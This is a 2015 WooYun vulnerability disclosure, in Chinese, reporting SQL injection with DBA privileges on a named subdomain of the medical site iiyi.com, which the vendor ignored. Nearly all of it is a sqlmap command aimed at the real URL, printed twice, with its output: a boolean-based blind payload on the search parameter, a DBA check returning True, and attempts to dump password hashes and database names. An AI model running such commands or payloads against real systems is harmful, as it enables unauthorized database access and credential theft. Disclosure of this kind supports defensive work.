当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115808

漏洞标题:爱爱医某站SQL注入DBA权限

相关厂商:爱爱医

漏洞作者: 路人甲

提交时间:2015-05-24 08:10

修复时间:2015-05-29 08:12

公开时间:2015-05-29 08:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-24: 细节已通知厂商并且等待厂商处理中
2015-05-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

rt

详细说明:

QQ截图20150523235654.png


[root@Hacker~]# Sqlmap Sqlmap -u "http://ziyuan.iiyi.com/source/search?kw=临床诊疗指南" --dbs --passwords --current-user --current-db --is-db
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to o
[*] starting at 19:58:35
[19:58:35] [INFO] resuming back-end DBMS 'oracle'
[19:58:35] [INFO] testing connection to the target URL
[19:58:35] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unha
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: kw
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: kw=??????' AND 2191=2191 AND 'arWK'='arWK
---
[19:58:35] [INFO] the back-end DBMS is Oracle
web application technology: Nginx, PHP 5.3.8
back-end DBMS: Oracle
[19:58:35] [INFO] fetching current user
[19:58:35] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[19:58:35] [INFO] retrieved:
[19:58:35] [INFO] heuristics detected web page charset 'utf-8'
[19:58:36] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user:   None
[19:58:36] [INFO] fetching current database
[19:58:36] [INFO] retrieved:
[19:58:37] [WARNING] reflective value(s) found and filtering out
[20:00:38] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):      None
[20:00:38] [INFO] testing if current user is DBA
current user is DBA:    True
[20:00:38] [INFO] fetching database users password hashes
[20:00:38] [INFO] fetching database users
[20:00:38] [INFO] fetching number of database users
[20:00:39] [INFO] retrieved:
[20:00:42] [CRITICAL] unable to retrieve the number of database users
[20:00:42] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[20:00:42] [INFO] fetching database (schema) names
[20:00:42] [INFO] fetching number of databases
[20:00:42] [INFO] retrieved:
[20:00:46] [ERROR] unable to retrieve the number of databases
[20:00:46] [INFO] falling back to current database
[20:00:46] [INFO] fetching current database
[20:00:46] [INFO] retrieved:
[20:01:38] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[20:03:05] [CRITICAL] unable to retrieve the database names
[20:03:05] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 7 times

漏洞证明:

[root@Hacker~]# Sqlmap Sqlmap -u "http://ziyuan.iiyi.com/source/search?kw=临床诊疗指南" --dbs --passwords --current-user --current-db --is-db
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to o
[*] starting at 19:58:35
[19:58:35] [INFO] resuming back-end DBMS 'oracle'
[19:58:35] [INFO] testing connection to the target URL
[19:58:35] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unha
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: kw
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: kw=??????' AND 2191=2191 AND 'arWK'='arWK
---
[19:58:35] [INFO] the back-end DBMS is Oracle
web application technology: Nginx, PHP 5.3.8
back-end DBMS: Oracle
[19:58:35] [INFO] fetching current user
[19:58:35] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[19:58:35] [INFO] retrieved:
[19:58:35] [INFO] heuristics detected web page charset 'utf-8'
[19:58:36] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user:   None
[19:58:36] [INFO] fetching current database
[19:58:36] [INFO] retrieved:
[19:58:37] [WARNING] reflective value(s) found and filtering out
[20:00:38] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):      None
[20:00:38] [INFO] testing if current user is DBA
current user is DBA:    True
[20:00:38] [INFO] fetching database users password hashes
[20:00:38] [INFO] fetching database users
[20:00:38] [INFO] fetching number of database users
[20:00:39] [INFO] retrieved:
[20:00:42] [CRITICAL] unable to retrieve the number of database users
[20:00:42] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[20:00:42] [INFO] fetching database (schema) names
[20:00:42] [INFO] fetching number of databases
[20:00:42] [INFO] retrieved:
[20:00:46] [ERROR] unable to retrieve the number of databases
[20:00:46] [INFO] falling back to current database
[20:00:46] [INFO] fetching current database
[20:00:46] [INFO] retrieved:
[20:01:38] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[20:03:05] [CRITICAL] unable to retrieve the database names
[20:03:05] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 7 times

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-29 08:12

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无